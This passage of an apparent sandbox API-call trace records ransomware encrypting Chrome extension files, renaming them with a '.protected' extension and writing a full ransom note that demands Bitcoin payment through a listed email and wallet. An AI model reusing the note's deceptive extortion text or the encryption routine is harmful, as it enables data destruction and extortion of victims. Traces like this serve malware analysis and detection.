pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\RESTORE_FILES.txt") returned 159 [0078.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\he\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.715] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.715] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.716] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.716] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.716] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.716] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.716] CloseHandle (hObject=0x164) returned 1 [0078.716] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0078.716] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0078.716] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi") returned 141 [0078.716] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0078.716] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*") returned 143 [0078.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.717] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.717] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.717] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.717] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.717] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\.") returned 143 [0078.717] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.717] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.717] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.717] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.717] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.717] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\..") returned 144 [0078.717] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.717] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.717] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.717] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.717] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") 
returned 155 [0078.717] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.718] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.718] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.718] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.718] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.718] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.718] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.718] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x123, lpOverlapped=0x0) returned 1 [0078.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffedd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.719] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x123, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x123, lpOverlapped=0x0) returned 1 [0078.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.719] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.720] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.720] CloseHandle (hObject=0x168) returned 1 [0078.720] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.protected") returned 165 [0078.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\messages.json.protected")) returned 1 [0078.720] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.720] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.720] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0078.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.721] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.721] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.722] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.722] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.722] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.722] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.722] CloseHandle (hObject=0x164) returned 1 [0078.722] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0078.722] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0078.722] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned 141 [0078.722] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0078.722] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0078.722] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*") returned 143 [0078.722] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.723] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.723] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.723] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.723] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.723] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.723] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\.") returned 143 [0078.723] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.724] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.724] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.724] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.724] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.724] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.724] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.724] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\..") returned 144 [0078.724] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.724] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.724] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.724] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.724] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.724] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.724] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.724] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.724] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.724] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.724] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.724] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.724] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.724] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0078.725] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.725] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.725] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.725] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe6, lpOverlapped=0x0) returned 1 [0078.725] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.725] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.726] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.726] CloseHandle (hObject=0x168) returned 1 [0078.726] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.protected") returned 165 [0078.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json.protected")) returned 1 [0078.726] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.726] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.726] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0078.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 